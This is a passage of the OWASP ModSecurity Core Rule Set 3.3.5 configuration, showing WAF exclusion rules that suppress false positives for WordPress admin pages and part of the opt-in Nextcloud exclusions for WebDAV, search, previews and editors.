ctl:ruleRemoveTargetById=942330;ARGS:customized,\ ctl:ruleRemoveTargetById=942340;ARGS:customized,\ ctl:ruleRemoveTargetById=942370;ARGS:customized,\ ctl:ruleRemoveTargetById=942430;ARGS:customized,\ ctl:ruleRemoveTargetById=942431;ARGS:customized,\ ctl:ruleRemoveTargetById=942460;ARGS:customized" # Appearance -> Widgets -> Live Preview SecRule ARGS:wp_customize "@streq on" \ "id:9002160,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=942200;ARGS:customized,\ ctl:ruleRemoveTargetById=942260;ARGS:customized,\ ctl:ruleRemoveTargetById=942300;ARGS:customized,\ ctl:ruleRemoveTargetById=942330;ARGS:customized,\ ctl:ruleRemoveTargetById=942340;ARGS:customized,\ ctl:ruleRemoveTargetById=942370;ARGS:customized,\ ctl:ruleRemoveTargetById=942430;ARGS:customized,\ ctl:ruleRemoveTargetById=942431;ARGS:customized,\ ctl:ruleRemoveTargetById=942460;ARGS:customized,\ ctl:ruleRemoveTargetById=920230;ARGS:partials,\ ctl:ruleRemoveTargetById=941320;ARGS:partials,\ ctl:ruleRemoveTargetById=942180;ARGS:partials,\ ctl:ruleRemoveTargetById=942200;ARGS:partials,\ ctl:ruleRemoveTargetById=942260;ARGS:partials,\ ctl:ruleRemoveTargetById=942330;ARGS:partials,\ ctl:ruleRemoveTargetById=942340;ARGS:partials,\ ctl:ruleRemoveTargetById=942370;ARGS:partials,\ ctl:ruleRemoveTargetById=942430;ARGS:partials,\ ctl:ruleRemoveTargetById=942431;ARGS:partials,\ ctl:ruleRemoveTargetById=942460;ARGS:partials" # Self calls to wp-cron.php?doing_wp_cron=[timestamp] # These requests may be missing Accept, Content-Length headers. # This rule must run in phase:1. SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \ "id:9002200,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=920180,\ ctl:ruleRemoveById=920300,\ ver:'OWASP_CRS/3.3.5'" # # [ Cookies ] # WP Session Manager # Cookie: _wp_session=[hex]||[timestamp]||[timestamp] # detected SQLi using libinjection with fingerprint 'n&1' SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \ "id:9002300,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:_wp_session" # # -=[ WordPress Administration Back-End (wp-admin) ]=- # # Skip this section for performance unless /wp-admin/ is in filename SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ "id:9002400,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-WORDPRESS-ADMIN" SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ "id:9002401,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-WORDPRESS-ADMIN" # # [ Installation ] # # WordPress installation: exclude database password SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \ "id:9002410,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:step "@streq 2" \ "t:none,\ chain" SecRule &ARGS:step "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" # WordPress installation: exclude admin password SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \ "id:9002420,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:step "@streq 2" \ "t:none,\ chain" SecRule &ARGS:step "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password2,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text" # # [ User management ] # # Edit logged-in user SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \ "id:9002520,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # Edit user SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \ "id:9002530,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # Create user SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \ "id:9002540,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq createuser" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" # # [ General exclusions ] # # _wp_http_referer and wp_http_referer are passed on a lot of wp-admin pages SecAction \ "id:9002600,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=920230;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=931130;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=932150;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=941100;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=942130;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=942200;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=942260;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=942431;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=942440;ARGS:_wp_http_referer,\ ctl:ruleRemoveTargetById=920230;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=931130;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=932150;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=941100;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942130;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\ ver:'OWASP_CRS/3.3.5'" # # [ Content editing ] # # Edit posts and pages # /wp-admin/post.php, /wp-admin/post.php?t=[timestamp] # - Themes do not properly escape post_title in HTML, so beware of XSS # and be conservative in excluding this parameter. # - Parameter _wp_http_referer can appear multiple times. SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \ "id:9002700,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@rx ^(?:edit|editpost)$" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:post_title,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ ctl:ruleRemoveById=920272,\ ctl:ruleRemoveById=921180" # Autosave posts and pages # ARGS_NAMES:data[wp-check-locked-posts][] can appear multiple times SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002710,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq heartbeat" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:data[wp_autosave][post_title],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:data[wp_autosave][content],\ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][post_id],\ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][lock],\ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-check-locked-posts][],\ ctl:ruleRemoveById=921180,\ ctl:ruleRemoveById=920272" # Edit menus SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \ "id:9002720,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=942460;ARGS:menu-name,\ ctl:ruleRemoveTargetById=941330;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=941340;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942200;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942260;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942330;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942340;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942430;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942431;ARGS:nav-menu-data,\ ctl:ruleRemoveTargetById=942460;ARGS:nav-menu-data" # Edit text widgets (can contain custom HTML) SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002730,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[0][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[1][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[2][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[3][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[4][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[5][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[6][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[7][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[8][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[9][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[10][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[11][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[12][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[13][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[14][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[15][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[16][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[17][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[18][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[19][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[20][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[21][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[22][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[23][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[24][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[25][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[26][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[27][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[28][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[29][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[30][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[31][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[32][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[33][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[34][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[35][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[36][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[37][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[38][text],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[39][text]" # Reorder widgets SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002740,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq widgets-order" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-1],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-1],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-2],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-2],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-3],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-3],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-4],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-4],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-5],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-5],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-6],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-6],\ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-7],\ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-7]" # Create permalink sample for new post SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002750,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq sample-permalink" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:new_title" # Add external link to menu SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002760,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq add-menu-item" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=931130;ARGS:menu-item[-1][menu-item-url]" # Editor: Add Media, Insert Media, Insert into page SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ "id:9002770,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:action "@streq send-attachment-to-editor" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html" # # [ Options and Settings ] # # Change site URL SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ "id:9002800,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:option_page "@streq general" \ "t:none,\ chain" SecRule &ARGS:option_page "@eq 1" \ "t:none,\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetById=931130;ARGS:home,\ ctl:ruleRemoveTargetById=931130;ARGS:siteurl" # Permalink settings # permalink_structure=/index.php/%year%/%monthnum%/%day%/%postname%/ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \ "id:9002810,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=920230;ARGS:selection,\ ctl:ruleRemoveTargetById=920272;ARGS:selection,\ ctl:ruleRemoveTargetById=942431;ARGS:selection,\ ctl:ruleRemoveTargetById=920230;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\ ver:'OWASP_CRS/3.3.5'" # Comments blacklist and moderation list SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ "id:9002820,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule ARGS:option_page "@streq discussion" \ "t:none,\ chain" SecRule &ARGS:option_page "@eq 1" \ "t:none,\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ chain" SecRule &ARGS:action "@eq 1" \ "t:none,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:blacklist_keys,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:moderation_keys" # Posts/pages overview search SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \ "id:9002830,\ phase:1,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\ ver:'OWASP_CRS/3.3.5'" # # [ Helpers ] # # /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, # admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags, # jquery-query,admin-comments,svg-painter,heartbeat,&load%5B%5D= # wp-auth-check,wp-a11y,wplink,jquery-ui-core,jquery-ui-widget, # jquery-ui-position,jquery-ui-menu,jquery-ui-autocomplete&ver=4.6.1 # # /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons, # admin-bar,buttons,media-views,common,forms,admin-menu,dashboard, # list-tables,edit,revisions,media,themes,about,nav-menu&load%5B%5D= # s,widgets,site-icon,l10n,wp-auth-check&ver=4.6.1 # # /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, # admin-bar,jquery-ui-widget,jquery-ui-position,wp-pointer, # wp-ajax-response,jquery-color,wp-lists,quicktags, # jqu&load%5B%5D=ery-query,admin-comments,jquery-ui-core, # jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore, # customize-base,customize&load%5B%5D=-loader,thickbox,plugin-install, # wp-util,wp-a11y,updates,shortcode,media-upload,svg-painter, # jquery-ui-accordion&ver=3f9999390861a0133beda3ee8acf152e SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ "id:9002900,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=921180,\ ctl:ruleRemoveTargetById=920273;ARGS_NAMES:load[],\ ctl:ruleRemoveTargetById=942432;ARGS_NAMES:load[],\ ctl:ruleRemoveTargetById=942360;ARGS:load[],\ ctl:ruleRemoveTargetById=942430;ARGS:load[],\ ctl:ruleRemoveTargetById=942431;ARGS:load[],\ ctl:ruleRemoveTargetById=942432;ARGS:load[],\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-WORDPRESS-ADMIN" SecMarker "END-WORDPRESS" modsecurity-crs-3.3.5/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf000066400000000000000000000247301446122515100245230ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # # ------------------------------------------------------------------------ # These exclusions remedy false positives in a default NextCloud install. # They will likely work with OwnCloud too, but you may have to modify them. # The exclusions are only active if crs_exclusions_nextcloud=1 is set. # See rule 900130 in crs-setup.conf.example for instructions. # # To relax upload restrictions for only the php files that need it, # you put something like this in crs-setup.conf: # # SecRule REQUEST_FILENAME "@rx /(?:remote.php|index.php)/" \ # "id:9003330,\ # phase:1,\ # t:none,\ # nolog,\ # pass,\ # tx.restricted_extensions='.bak/ .config/ .conf/'" # # Large uploads can be modified with SecRequestBodyLimit. Or they # can be more controlled by using the following: # # SecRule REQUEST_URI "@endsWith /index.php/apps/files/ajax/upload.php" \ # "id:9003610,\ # phase:1,\ # t:none,\ # nolog,\ # ctl:requestBodyLimit=1073741824" # # --------------------- SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ "id:9003000,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-NEXTCLOUD" SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ "id:9003001,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-NEXTCLOUD" # # [ File Manager ] # # # The web interface uploads files, and interacts with the user. SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ "id:9003100,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveByTag=attack-injection-php,\ ctl:ruleRemoveById=941000-942999,\ ctl:ruleRemoveById=951000-951999,\ ctl:ruleRemoveById=953100-953130,\ ctl:ruleRemoveById=920420,\ ctl:ruleRemoveById=920440,\ ver:'OWASP_CRS/3.3.5'" # Skip PUT parsing for invalid encoding / protocol violations in binary files. SecRule REQUEST_METHOD "@streq PUT" \ "id:9003105,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ "t:none,\ ctl:ruleRemoveById=920000-920999,\ ctl:ruleRemoveById=932000-932999,\ ctl:ruleRemoveById=921150,\ ctl:ruleRemoveById=930110,\ ctl:ruleRemoveById=930120" # Allow the data type 'text/vcard' SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ "id:9003110,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" # Allow the data type 'application/octet-stream' SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \ "id:9003115,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \ "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'" # Allow data types like video/mp4 SecRule REQUEST_METHOD "@streq PUT" \ "id:9003116,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \ "ctl:ruleRemoveById=920340,\ ctl:ruleRemoveById=920420" # Allow characters like /../ in files. # Allow all kind of filetypes. # Allow source code. SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ "id:9003120,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=930100-930110,\ ctl:ruleRemoveById=951000-951999,\ ctl:ruleRemoveById=953100-953130,\ ctl:ruleRemoveById=920440,\ ver:'OWASP_CRS/3.3.5'" # Allow REPORT requests without Content-Type header (at least the iOS app does this) SecRule REQUEST_METHOD "@streq REPORT" \ "id:9003121,\ phase:2,\ pass,\ t:none,\ nolog,\ chain" SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ "t:none,\ ctl:ruleRemoveById=920340" # [ Searchengine ] # # NexCloud uses a search field for filename or content queries. SecRule REQUEST_FILENAME "@contains /index.php/core/search" \ "id:9003125,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\ ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\ ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\ ver:'OWASP_CRS/3.3.5'" # [ DAV ] # # NextCloud uses DAV methods with index.php and remote.php to do many things # The default ones in ModSecurity are: GET HEAD POST OPTIONS # # Looking through the code, and via testing, I found these: # # File manager: PUT DELETE MOVE PROPFIND PROPPATCH # Calendars: REPORT # Others in the code or js files: PATCH MKCOL MOVE TRACE # Others that I added just in case, and they seem related: # CHECKOUT COPY LOCK MERGE MKACTIVITY UNLOCK. SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \ "id:9003130,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'" # We need to allow DAV methods for sharing files, and removing shares # DELETE - when the share is removed # PUT - when setting a password / expiration time SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \ "id:9003140,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'" # [ Preview and Thumbnails ] SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \ "id:9003150,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=932150;ARGS:file,\ ver:'OWASP_CRS/3.3.5'" # Filepreview for trashbin SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview.php" \ "id:9003155,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=932150;ARGS:file,\ ctl:ruleRemoveTargetById=942190;ARGS:file,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ "id:9003160,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\ ver:'OWASP_CRS/3.3.5'" # [ Ownnote ] SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \ "id:9003300,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveById=941150,\ ver:'OWASP_CRS/3.3.5'" # [ Text Editor ] # # This file can save anything, and it's name could be lots of things. SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \ "id:9003310,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filecontents,\ ctl:ruleRemoveTargetById=921110-921160;ARGS:filecontents,\ ctl:ruleRemoveTargetById=932150;ARGS:filename,\ ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\ ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\ ver:'OWASP_CRS/3.3.5'" # [ Address Book ] # # Allow the data type 'text/vcard' SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ "id:9003320,\ phase:2,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" # Allow modifying contacts via the web interface SecRule REQUEST_METHOD "@streq PUT" \ "id:9003321,\ phase:1,\ pass,\ t:none,\ nolog,\ chain" SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ "t:none,\ ctl:ruleRemoveById=200002" # [ Calendar ] # # Allow the data 